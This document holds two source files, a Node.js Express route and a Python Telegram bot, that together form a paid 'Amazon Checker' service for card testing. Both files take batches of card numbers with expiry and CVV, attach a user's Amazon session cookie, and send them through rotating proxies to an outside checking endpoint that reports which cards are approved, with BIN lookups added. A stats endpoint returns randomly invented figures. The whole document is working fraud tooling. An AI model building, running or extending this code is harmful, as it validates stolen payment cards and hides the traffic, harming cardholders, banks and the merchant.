File: backend/routes/amazon.js
import express from 'express';
import { protect } from '../middleware/auth.js';
import User from '../models/User.js';
import Proxy from '../models/Proxy.js';
import AmazonRegionalCookie from '../models/AmazonRegionalCookie.js';
import axios from 'axios';

const router = express.Router();

// Middleware para verificar si el usuario tiene acceso a Amazon
const checkAmazonAccess = async (req, res, next) => {
  try {
    const user = await User.findById(req.user.id);
    if (!user) {
      return res.status(404).json({ message: 'Usuario no encontrado' });
    }

    // Verificar si el usuario está baneado
    if (user.role === 'baneado') {
      return res.status(403).json({ message: 'Usuario baneado' });
    }

    // Verificar si el usuario tiene plan premium o es admin
    if (user.role !== 'admin' && user.subscriptionStatus === 'free') {
      return res.status(403).json({ 
        message: 'Se requiere plan premium para usar Amazon Checker',
        requiresUpgrade: true
      });
    }

    req.userData = user;
    next();
  } catch (error) {
    res.status(500).json({ message: 'Error al verificar acceso' });
  }
};

// Guardar cookie de Amazon
router.post('/save-cookie', protect, checkAmazonAccess, async (req, res) => {
  try {
    const { cookie } = req.body;
    
    if (!cookie) {
      return res.status(400).json({ message: 'Cookie es requerida' });
    }

    // Guardar cookie en el usuario
    await User.findByIdAndUpdate(req.user.id, {
      amazonCookie: cookie,
      cookieUpdatedAt: new Date()
    });

    res.json({ 
      message: 'Cookie guardada correctamente',
      success: true 
    });
  } catch (error) {
    console.error('Error al guardar cookie:', error);
    res.status(500).json({ message: 'Error al guardar cookie' });
  }
});

// Obtener cookie de Amazon
router.get('/get-cookie', protect, checkAmazonAccess, async (req, res) => {
  try {
    const user = await User.findById(req.user.id);
    
    if (!user.amazonCookie) {
      return res.status(404).json({ message: 'No hay cookie guardada' });
    }

    res.json({ 
      cookie: user.amazonCookie,
      updatedAt: user.cookieUpdatedAt
    });
  } catch (error) {
    console.error('Error al obtener cookie:', error);
    res.status(500).json({ message: 'Error al obtener cookie' });
  }
});

// Verificar tarjetas de Amazon con cookie regional
router.post('/check-regional-cards', protect, checkAmazonAccess, async (req, res) => {
  try {
    const { cards } = req.body;
    
    if (!cards || !Array.isArray(cards) || cards.length === 0) {
      return res.status(400).json({ message: 'Se requieren tarjetas para verificar' });
    }

    if (cards.length > 15) {
      return res.status(400).json({ message: 'Máximo 15 tarjetas por consulta' });
    }

    // Obtener cookie regional
    const cookieData = await AmazonRegionalCookie.findOne({ user_id: req.user.id });
    
    if (!cookieData) {
      return res.status(400).json({ message: 'No hay cookie regional guardada. Guarda una cookie primero.' });
    }

    // Validar formato de tarjetas
    const cardPattern = /^\d{15,16}\|\d{1,2}\|\d{2,4}\|\d{3,4}$/;
    const validCards = cards.filter(card => cardPattern.test(card));
    
    if (validCards.length === 0) {
      return res.status(400).json({ message: 'Formato inválido. Usa: cc|mm|aaaa|cvv' });
    }

    // Obtener proxy aleatorio
    const proxy = await Proxy.findOne({ isActive: true })
      .sort({ successRate: -1, lastUsed: 1 });
    
    if (!proxy) {
      return res.status(500).json({ message: 'No hay proxies disponibles para la verificación' });
    }

    // Función para verificar tarjeta con proxy usando cookie regional
    const checkCardWithProxy = async (card) => {
      const startTime = Date.now();
      try {
        const [cc, mes, ano, cvv] = card.split('|');
        
        // Configurar proxy para axios
        const proxyConfig = {
          host: proxy.host,
          port: proxy.port,
          protocol: proxy.protocol
        };
        
        if (proxy.username && proxy.password) {
          proxyConfig.auth = {
            username: proxy.username,
            password: proxy.password
          };
        }

        // Preparar payload para la API de Amazon con cookie regional
        const payload = {
          lista: card,
          cookies: cookieData.cookie
        };

        // Hacer petición con proxy
        const response = await axios.post(
          'https://ookurachk.blog/amazon/Amazon.php',
          payload,
          {
            proxy: proxyConfig,
            timeout: 30000,
            headers: {
              'Content-Type': 'application/x-www-form-urlencoded',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            }
          }
        );

        const responseText = response.data;
        const responseTime = Date.now() - startTime;

        // Parsear respuesta (similar al código Python original)
        const statusMatch = responseText.match(/<span class="text-(success|danger)">(Aprovada|Reprovada|Erros)<\/span>/);
        const messageMatch = responseText.match(/<span class="text-(success|danger)">(.+?)<\/span>\s*➔\s*Tempo de resposta/s);
        const removedMatch = responseText.match(/Removido: (✅|❌)/);

        let status = "⚠️ Error";
        let response_msg = "Error al procesar la respuesta de la API";
        let removed_status = "❌ No removido";

        if (messageMatch) {
          const response_msg_raw = messageMatch[2].trim();
          if (response_msg_raw.includes("Erro ao obter acesso passkey")) {
            status = "❌ Invalid Cookies";
            response_msg = "Close and login to your account again";
          } else if (response_msg_raw.includes("Cookies não detectado")) {
            status = "❌ Invalid Cookies";
            response_msg = "Invalid cookie, please change";
          } else if (response_msg_raw.includes("Um endereço foi cadatrado")) {
            status = "⚠️ Address Required";
            response_msg = "Add address to account";
          } else if (response_msg_raw.includes("Erro interno - Amazon API")) {
            status = "⚠️ Error";
            response_msg = "Internal API Error";
          } else if (response_msg_raw.includes("Lista inválida")) {
            status = "⚠️ Error";
            response_msg = "Invalid card format";
          } else {
            if (statusMatch) {
              const status_raw = statusMatch[2];
              if (status_raw === "Aprovada") {
                status = "Approved Card!";
                response_msg = "Approved Card! ✅";
              } else if (status_raw === "Reprovada") {
                status = "Declined Card!";
                response_msg = "Declined Card! ❌";
              }
            }
          }
        }

        if (removedMatch) {
          removed_status = removedMatch[1] === "✅" ? "✅ Removido" : "❌ No removido";
        }

        // Actualizar estadísticas del proxy (éxito)
        proxy.successCount += 1;
        proxy.responseTime = responseTime;
        proxy.lastUsed = new Date();
        proxy.updateSuccessRate();
        await proxy.save();

        // Obtener información del BIN
        const binResponse = await axios.get(`https://binlist.io/lookup/${cc.substring(0, 6)}`);
        const binData = binResponse.data;

        return {
          card: card,
          status: status,
          response: response_msg,
          removed: removed_status,
          bin: {
            scheme: binData.scheme || 'UNKNOWN',
            type: binData.type || 'UNKNOWN',
            category: binData.brand || 'UNKNOWN'
          },
          country: {
            name: binData.country?.name || 'Unknown',
            emoji: binData.country?.emoji || '🌍'
          },
          bank: {
            name: binData.bank?.name || 'Unknown Bank'
          },
          processingTime: (responseTime / 1000).toFixed(4),
          proxyUsed: `${proxy.host}:${proxy.port}`
        };

      } catch (error) {
        const responseTime = Date.now() - startTime;
        
        // Actualizar estadísticas del proxy (fallo)
        proxy.failCount += 1;
        proxy.responseTime = responseTime;
        proxy.lastUsed = new Date();
        proxy.updateSuccessRate();
        await proxy.save();

        return {
          card: card,
          status: "⚠️ Error",
          response: "Error de conexión o proxy",
          removed: "❌ No removido",
          bin: {
            scheme: 'UNKNOWN',
            type: 'UNKNOWN',
            category: 'UNKNOWN'
          },
          country: {
            name: 'Unknown',
            emoji: '🌍'
          },
          bank: {
            name: 'Unknown Bank'
          },
          processingTime: (responseTime / 1000).toFixed(4),
          proxyUsed: `${proxy.host}:${proxy.port}`,
          error: error.message
        };
      }
    };

    // Procesar tarjetas con proxy
    const results = [];
    for (const card of validCards) {
      const result = await checkCardWithProxy(card);
      results.push(result);
      
      // Pequeña pausa entre verificaciones
      await new Promise(resolve => setTimeout(resolve, 1000));
    }

    res.json({
      success: true,
      results: results,
      totalCards: validCards.length,
      processedAt: new Date().toISOString()
    });

  } catch (error) {
    console.error('Error al verificar tarjetas con cookie regional:', error);
    res.status(500).json({ message: 'Error al verificar tarjetas con cookie regional' });
  }
});

// Verificar tarjetas de Amazon
router.post('/check-cards', protect, checkAmazonAccess, async (req, res) => {
  try {
    const { cards } = req.body;
    
    if (!cards || !Array.isArray(cards) || cards.length === 0) {
      return res.status(400).json({ message: 'Se requieren tarjetas para verificar' });
    }

    if (cards.length > 15) {
      return res.status(400).json({ message: 'Máximo 15 tarjetas por consulta' });
    }

    const user = await User.findById(req.user.id);
    
    if (!user.amazonCookie) {
      return res.status(400).json({ message: 'No hay cookie guardada. Guarda una cookie primero.' });
    }

    // Validar formato de tarjetas
    const cardPattern = /^\d{15,16}\|\d{1,2}\|\d{2,4}\|\d{3,4}$/;
    const validCards = cards.filter(card => cardPattern.test(card));
    
    if (validCards.length === 0) {
      return res.status(400).json({ message: 'Formato inválido. Usa: cc|mm|aaaa|cvv' });
    }

    // Obtener proxy aleatorio
    const proxy = await Proxy.findOne({ isActive: true })
      .sort({ successRate: -1, lastUsed: 1 });
    
    if (!proxy) {
      return res.status(500).json({ message: 'No hay proxies disponibles para la verificación' });
    }

    // Función para verificar tarjeta con proxy
    const checkCardWithProxy = async (card) => {
      const startTime = Date.now();
      try {
        const [cc, mes, ano, cvv] = card.split('|');
        
        // Configurar proxy para axios
        const proxyConfig = {
          host: proxy.host,
          port: proxy.port,
          protocol: proxy.protocol
        };
        
        if (proxy.username && proxy.password) {
          proxyConfig.auth = {
            username: proxy.username,
            password: proxy.password
          };
        }

        // Preparar payload para la API de Amazon
        const payload = {
          lista: card,
          cookies: user.amazonCookie
        };

        // Hacer petición con proxy - siempre usar la URL directa
        const response = await axios.post(
          'https://ookurachk.blog/amazon/Amazon.php',
          payload,
          {
            proxy: proxyConfig,
            timeout: 30000,
            headers: {
              'Content-Type': 'application/x-www-form-urlencoded',
              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            }
          }
        );

        const responseText = response.data;
        const responseTime = Date.now() - startTime;

        // Parsear respuesta (similar al código Python original)
        const statusMatch = responseText.match(/<span class="text-(success|danger)">(Aprovada|Reprovada|Erros)<\/span>/);
        const messageMatch = responseText.match(/<span class="text-(success|danger)">(.+?)<\/span>\s*➔\s*Tempo de resposta/s);
        const removedMatch = responseText.match(/Removido: (✅|❌)/);

        let status = "⚠️ Error";
        let response_msg = "Error al procesar la respuesta de la API";
        let removed_status = "❌ No removido";

        if (messageMatch) {
          const response_msg_raw = messageMatch[2].trim();
          if (response_msg_raw.includes("Erro ao obter acesso passkey")) {
            status = "❌ Invalid Cookies";
            response_msg = "Close and login to your account again";
          } else if (response_msg_raw.includes("Cookies não detectado")) {
            status = "❌ Invalid Cookies";
            response_msg = "Invalid cookie, please change";
          } else if (response_msg_raw.includes("Um endereço foi cadatrado")) {
            status = "⚠️ Address Required";
            response_msg = "Add address to account";
          } else if (response_msg_raw.includes("Erro interno - Amazon API")) {
            status = "⚠️ Error";
            response_msg = "Internal API Error";
          } else if (response_msg_raw.includes("Lista inválida")) {
            status = "⚠️ Error";
            response_msg = "Invalid card format";
          } else {
            if (statusMatch) {
              const status_raw = statusMatch[2];
              if (status_raw === "Aprovada") {
                status = "Approved Card!";
                response_msg = "Approved Card! ✅";
              } else if (status_raw === "Reprovada") {
                status = "Declined Card!";
                response_msg = "Declined Card! ❌";
              }
            }
          }
        }

        if (removedMatch) {
          removed_status = removedMatch[1] === "✅" ? "✅ Removido" : "❌ No removido";
        }

        // Actualizar estadísticas del proxy (éxito)
        proxy.successCount += 1;
        proxy.responseTime = responseTime;
        proxy.lastUsed = new Date();
        proxy.updateSuccessRate();
        await proxy.save();

        // Obtener información del BIN
        const binResponse = await axios.get(`https://binlist.io/lookup/${cc.substring(0, 6)}`);
        const binData = binResponse.data;

        return {
          card: card,
          status: status,
          response: response_msg,
          removed: removed_status,
          bin: {
            scheme: binData.scheme || 'UNKNOWN',
            type: binData.type || 'UNKNOWN',
            category: binData.brand || 'UNKNOWN'
          },
          country: {
            name: binData.country?.name || 'Unknown',
            emoji: binData.country?.emoji || '🌍'
          },
          bank: {
            name: binData.bank?.name || 'Unknown Bank'
          },
          processingTime: (responseTime / 1000).toFixed(4),
          proxyUsed: `${proxy.host}:${proxy.port}`
        };

      } catch (error) {
        const responseTime = Date.now() - startTime;
        
        // Actualizar estadísticas del proxy (fallo)
        proxy.failCount += 1;
        proxy.responseTime = responseTime;
        proxy.lastUsed = new Date();
        proxy.updateSuccessRate();
        await proxy.save();

        return {
          card: card,
          status: "⚠️ Error",
          response: "Error de conexión o proxy",
          removed: "❌ No removido",
          bin: {
            scheme: 'UNKNOWN',
            type: 'UNKNOWN',
            category: 'UNKNOWN'
          },
          country: {
            name: 'Unknown',
            emoji: '🌍'
          },
          bank: {
            name: 'Unknown Bank'
          },
          processingTime: (responseTime / 1000).toFixed(4),
          proxyUsed: `${proxy.host}:${proxy.port}`,
          error: error.message
        };
      }
    };

    // Procesar tarjetas con proxy
    const results = [];
    for (const card of validCards) {
      const result = await checkCardWithProxy(card);
      results.push(result);
      
      // Pequeña pausa entre verificaciones
      await new Promise(resolve => setTimeout(resolve, 1000));
    }

    res.json({
      success: true,
      results: results,
      totalCards: validCards.length,
      processedAt: new Date().toISOString()
    });

  } catch (error) {
    console.error('Error al verificar tarjetas:', error);
    res.status(500).json({ message: 'Error al verificar tarjetas' });
  }
});

// Obtener estadísticas de Amazon
router.get('/stats', protect, checkAmazonAccess, async (req, res) => {
  try {
    const user = await User.findById(req.user.id);
    
    // Simular estadísticas
    const stats = {
      totalChecks: Math.floor(Math.random() * 1000) + 100,
      approvedCards: Math.floor(Math.random() * 200) + 50,
      declinedCards: Math.floor(Math.random() * 300) + 100,
      successRate: Math.floor(Math.random() * 30) + 20,
      lastCheck: user.lastAmazonCheck || null,
      cookieStatus: user.amazonCookie ? 'Active' : 'Inactive'
    };

    res.json(stats);
  } catch (error) {
    console.error('Error al obtener estadísticas:', error);
    res.status(500).json({ message: 'Error al obtener estadísticas' });
  }
});

// Guardar cookie regional de Amazon (from Telegram bot)
router.post('/save-regional-cookie', protect, checkAmazonAccess, async (req, res) => {
  try {
    const { cookie } = req.body;
    
    if (!cookie) {
      return res.status(400).json({ message: 'Cookie es requerida' });
    }

    // Save regional cookie in database
    await AmazonRegionalCookie.updateOne(
      { user_id: req.user.id },
      { $set: { cookie: cookie } },
      { upsert: true }
    );

    res.json({ 
      message: 'Cookie regional guardada correctamente',
      success: true 
    });
  } catch (error) {
    console.error('Error al guardar cookie regional:', error);
    res.status(500).json({ message: 'Error al guardar cookie regional' });
  }
});

// Obtener cookie regional de Amazon
router.get('/get-regional-cookie', protect, checkAmazonAccess, async (req, res) => {
  try {
    const cookieData = await AmazonRegionalCookie.findOne({ user_id: req.user.id });
    
    if (!cookieData) {
      return res.status(404).json({ message: 'No hay cookie regional guardada' });
    }

    res.json({ 
      cookie: cookieData.cookie,
      updatedAt: cookieData.updatedAt
    });
  } catch (error) {
    console.error('Error al obtener cookie regional:', error);
    res.status(500).json({ message: 'Error al obtener cookie regional' });
  }
});

export default router; 

File: uploads/amazon.py
import time
import re
import requests
import json
import uuid
import string
from random import choice
from pyrogram import Client, filters
from db.mongo_client import MongoDB
import asyncio
import aiohttp
import base64
from srca.configs import addCommand

# 📌 Guardar la cookie de un usuario
def save_cookie(user_id, cookie):
    try:
        # Usar MongoDB para guardar la cookie
        db = MongoDB()
        db.db["cookies_regional"].update_one(
            {"user_id": user_id},
            {"$set": {"cookie": cookie}},
            upsert=True
        )
        return True, "Cookie guardada correctamente"
    except Exception as e:
        return False, f"Error al guardar la cookie: {str(e)}"

# 📌 Obtener la cookie de un usuario
def get_cookie(user_id):
    db = MongoDB()
    data = db.db["cookies_regional"].find_one({"user_id": user_id})
    return data["cookie"] if data else None

# 📌 Comando para guardar la cookie
@Client.on_message(filters.command("cookie", prefixes=['.', '/', '!', '$'], case_sensitive=False) & filters.text)
async def set_cookie_command(client, message):
    try:
        user_id = message.from_user.id
        args = message.text.split(maxsplit=1)
        
        if len(args) < 2:
            return await message.reply("⚠️ Debes proporcionar una cookie.\n\nEjemplo:\n`/cookie [tu_cookie]`")
        
        cookie = args[1]
        success, msg = save_cookie(user_id, cookie)
        
        if success:
            await message.reply("✅ Cookie guardada correctamente. Use /amazon para verificar tarjetas")
        else:
            await message.reply(f"❌ {msg}")
            
    except Exception as e:
        await message.reply(f"⚠️ Error al guardar la cookie: {str(e)}")

# 📌 Comando para verificar tarjetas
@addCommand('am')
async def check_cards(client, message):
    try:
        inicio = time.time()
        user_id = message.from_user.id

        # Verificar usuario y obtener cookie
        db = MongoDB()
        user_data = db.query_user(user_id)
        
        if not user_data:
            return await message.reply("<b>Primero debes registrarte para usar este comando, usa /register</b>")
        
        if user_data['role'] == 'baneado':
            return await message.reply("<b>No tienes permiso para usar el bot.❌\nRazón: Baneado.</b>")
        
        if not db.admin(user_id) and user_data.get('plan', 'free') == 'free':
            return await message.reply('<b>🚫 Usuario Free</b>\n\n¡Aprovecha todo el potencial del bot!\nActualiza a premium y accede a herramientas exclusivas.\n👉 <a href="https://t.me/+A6wPSRDlqu8yZDMx">Solicitar upgrade</a>')

        # Obtener la cookie
        cookie_data = get_cookie(user_id)
        if not cookie_data:
            return await message.reply("⚠️ No tienes una cookie guardada. Usa /cookie [cookie] para agregar una.")

        # Extraer tarjetas más eficientemente
        ccs = []
        text_lines = message.text.split('\n')
        cc_pattern = r"^\d{15,16}\|\d{1,2}\|\d{2,4}\|\d{3,4}$"
        
        # Procesar primera línea (comando)
        cmd_parts = text_lines[0].split()
        if len(cmd_parts) > 1 and re.match(cc_pattern, cmd_parts[1]):
            ccs.append(cmd_parts[1])
        
        # Procesar líneas adicionales (límite de 15 tarjetas)
        for line in text_lines[1:15]:
            if re.match(cc_pattern, line.strip()):
                ccs.append(line.strip())

        if not ccs:
            return await message.reply(f"<b>Formato inválido. Usa /am cc|mm|aaaa|cvv</b>")
        
        if len(ccs) > 15:
            return await message.reply("<b>❌ Máximo 15 tarjetas por consulta</b>")

        # Mensaje inicial
        loading_message = await message.reply(f'''<b>・ Amazon Global

• Cc: <code>{ccs[0]}</code>      
• Status: Processing... [ ☃️ ]
• From: {message.from_user.first_name}</b>''')
        
        # Procesar tarjetas
        resultados = []
        for idx, ccvip in enumerate(ccs, 1):
            try:
                cc, mes, ano, cvv = ccvip.split('|')

                # Obtener información del BIN
                req = await asyncio.to_thread(requests.get, f'https://binlist.io/lookup/{cc[:6]}')

                # Preparar la solicitud a la API
                headers = {}
                payload = {
                    'lista': ccvip.strip(),
                    'cookies': cookie_data.strip()
                }

                # Hacer la petición a la API
                async with aiohttp.ClientSession() as session:
                    async with session.post(
                        "https://ookurachk.blog/amazon/Amazon.php",
                        data=payload,
                        headers=headers,
                        timeout=180
                    ) as response:
                        response_text = await response.text()

                # Parsear la respuesta HTML
                status_match = re.search(r'<span class="text-(success|danger)">(Aprovada|Reprovada|Erros)</span>', response_text)
                message_match = re.search(r'<span class="text-(success|danger)">(.+?)</span>\s*➔\s*Tempo de resposta', response_text, re.DOTALL)
                removed_match = re.search(r'Removido: (✅|❌)', response_text)

                status = "⚠️ Error"
                response_msg = "Error al procesar la respuesta de la API"
                removed_status = "❌ No removido"

                # Procesar la respuesta
                if message_match:
                    response_msg_raw = message_match.group(2).strip()
                    if "Erro ao obter acesso passkey" in response_msg_raw:
                        status = "❌ Invalid Cookies"
                        response_msg = "Close and login to your account again"
                    elif "Cookies não detectado" in response_msg_raw:
                        status = "❌ Invalid Cookies"
                        response_msg = "Invalid cookie, please change"
                    elif "Um endereço foi cadatrado" in response_msg_raw:
                        status = "⚠️ Address Required"
                        response_msg = "Add address to account"
                    elif "Erro interno - Amazon API" in response_msg_raw:
                        status = "⚠️ Error"
                        response_msg = "Internal API Error"
                    elif "Lista inválida" in response_msg_raw:
                        status = "⚠️ Error"
                        response_msg = "Invalid card format"
                    else:
                        if status_match:
                            status_raw = status_match.group(2)
                            if status_raw == "Aprovada":
                                status = "Approved Card!"
                                response_msg = "Approved Card! ✅"
                            elif status_raw == "Reprovada":
                                status = "Declined Card!"
                                response_msg = "Declined Card! ❌"

                if removed_match:
                    removed_status = removed_match.group(1) + " Removido" if removed_match.group(1) == "✅" else "❌ No removido"

                # Agregar resultado a la lista
                resultados.append(f'''<b>・ Amazon Global

• Cc: <code>{ccvip}</code>
• Status: {status}
• Response: <code>{response_msg}</code>

• Bin: {req.json()['scheme']} {req.json()['type']} {req.json()['category']}
• Country: {req.json()['country']['name']} [{req.json()['country']['emoji']}]
• Bank: {req.json()['bank']['name']}

• Pxs: Live ✅
• Time: <code>{time.time()-inicio:0.4f}'s</code>
• From: {message.from_user.first_name}</b>''')

                # Actualizar mensaje con todos los resultados
                texto_final = "\n\n".join(resultados)
                try:
                    await loading_message.edit_text(texto_final)
                    await asyncio.sleep(2)  # Esperar 2 segundos entre actualizaciones
                except Exception as e:
                    print(f"Error al actualizar mensaje: {str(e)}")
                    continue

            except Exception as e:
                try:
                    await loading_message.edit_text(f"<b>Error: {str(e)}</b>")
                    await asyncio.sleep(2)
                except:
                    pass
                continue

    except Exception as e:
        await message.reply(f"<b>⚠️ Error general: {str(e)}</b>")

# 📌 Comando para verificar tarjetas
@Client.on_message(filters.command("amazon", prefixes="."))
async def amazon_command(client, message):
    try:
        inicio = time.time()
        user_id = message.from_user.id

        # Verificar usuario y obtener cookie
        db = MongoDB()
        user_data = db.query_user(user_id)
        
        if not user_data:
            return await message.reply("<b>Primero debes registrarte para usar este comando, usa /register</b>")
        
        if user_data['role'] == 'baneado':
            return await message.reply("<b>No tienes permiso para usar el bot.❌\nRazón: Baneado.</b>")
        
        if not db.admin(user_id) and user_data.get('plan', 'free') == 'free':
            return await message.reply('<b>🚫 Usuario Free</b>\n\n¡Aprovecha todo el potencial del bot!\nActualiza a premium y accede a herramientas exclusivas.\n👉 <a href="https://t.me/+A6wPSRDlqu8yZDMx">Solicitar upgrade</a>')

        # Obtener la cookie
        cookie_data = get_cookie(user_id)
        if not cookie_data:
            return await message.reply("⚠️ No tienes una cookie guardada. Usa /cookie [cookie] para agregar una.")

        # Extraer tarjetas más eficientemente
        ccs = []
        text_lines = message.text.split('\n')
        cc_pattern = r"^\d{15,16}\|\d{1,2}\|\d{2,4}\|\d{3,4}$"
        
        # Procesar primera línea (comando)
        cmd_parts = text_lines[0].split()
        if len(cmd_parts) > 1 and re.match(cc_pattern, cmd_parts[1]):
            ccs.append(cmd_parts[1])
        
        # Procesar líneas adicionales (límite de 15 tarjetas)
        for line in text_lines[1:15]:
            if re.match(cc_pattern, line.strip()):
                ccs.append(line.strip())

        if not ccs:
            return await message.reply(f"<b>Formato inválido. Usa /am cc|mm|aaaa|cvv</b>")
        
        if len(ccs) > 15:
            return await message.reply("<b>❌ Máximo 15 tarjetas por consulta</b>")

        # Mensaje inicial
        loading_message = await message.reply(f'''<b>・ Amazon Global

• Cc: <code>{ccs[0]}</code>      
• Status: Processing... [ ☃️ ]
• From: {message.from_user.first_name}</b>''')
        
        # Procesar tarjetas
        resultados = []
        for idx, ccvip in enumerate(ccs, 1):
            try:
                cc, mes, ano, cvv = ccvip.split('|')

                # Obtener información del BIN
                req = await asyncio.to_thread(requests.get, f'https://binlist.io/lookup/{cc[:6]}')

                # Preparar la solicitud a la API
                headers = {}
                payload = {
                    'lista': ccvip.strip(),
                    'cookies': cookie_data.strip()
                }

                # Hacer la petición a la API
                async with aiohttp.ClientSession() as session:
                    async with session.post(
                        "#APIAMAZON",
                        data=payload,
                        headers=headers,
                        timeout=180
                    ) as response:
                        response_text = await response.text()

                # Parsear la respuesta HTML
                status_match = re.search(r'<span class="text-(success|danger)">(Aprovada|Reprovada|Erros)</span>', response_text)
                message_match = re.search(r'<span class="text-(success|danger)">(.+?)</span>\s*➔\s*Tempo de resposta', response_text, re.DOTALL)
                removed_match = re.search(r'Removido: (✅|❌)', response_text)

                status = "⚠️ Error"
                response_msg = "Error al procesar la respuesta de la API"
                removed_status = "❌ No removido"

                # Procesar la respuesta
                if message_match:
                    response_msg_raw = message_match.group(2).strip()
                    if "Erro ao obter acesso passkey" in response_msg_raw:
                        status = "❌ Invalid Cookies"
                        response_msg = "Close and login to your account again"
                    elif "Cookies não detectado" in response_msg_raw:
                        status = "❌ Invalid Cookies"
                        response_msg = "Invalid cookie, please change"
                    elif "Um endereço foi cadatrado" in response_msg_raw:
                        status = "⚠️ Address Required"
                        response_msg = "Add address to account"
                    elif "Erro interno - Amazon API" in response_msg_raw:
                        status = "⚠️ Error"
                        response_msg = "Internal API Error"
                    elif "Lista inválida" in response_msg_raw:
                        status = "⚠️ Error"
                        response_msg = "Invalid card format"
                    else:
                        if status_match:
                            status_raw = status_match.group(2)
                            if status_raw == "Aprovada":
                                status = "Approved Card!"
                                response_msg = "Approved Card! ✅"
                            elif status_raw == "Reprovada":
                                status = "Declined Card!"
                                response_msg = "Declined Card! ❌"

                if removed_match:
                    removed_status = removed_match.group(1) + " Removido" if removed_match.group(1) == "✅" else "❌ No removido"

                # Agregar resultado a la lista
                resultados.append(f'''<b>・ Amazon Global

• Cc: <code>{ccvip}</code>
• Status: {status}
• Response: <code>{response_msg}</code>

• Bin: {req.json()['scheme']} {req.json()['type']} {req.json()['category']}
• Country: {req.json()['country']['name']} [{req.json()['country']['emoji']}]
• Bank: {req.json()['bank']['name']}

• Pxs: Live ✅
• Time: <code>{time.time()-inicio:0.4f}'s</code>
• From: {message.from_user.first_name}</b>''')

                # Actualizar mensaje con todos los resultados
                texto_final = "\n\n".join(resultados)
                try:
                    await loading_message.edit_text(texto_final)
                    await asyncio.sleep(2)  # Esperar 2 segundos entre actualizaciones
                except Exception as e:
                    print(f"Error al actualizar mensaje: {str(e)}")
                    continue

            except Exception as e:
                try:
                    await loading_message.edit_text(f"<b>Error: {str(e)}</b>")
                    await asyncio.sleep(2)
                except:
                    pass
                continue

    except Exception as e:
        await message.reply(f"<b>⚠️ Error general: {str(e)}</b>")
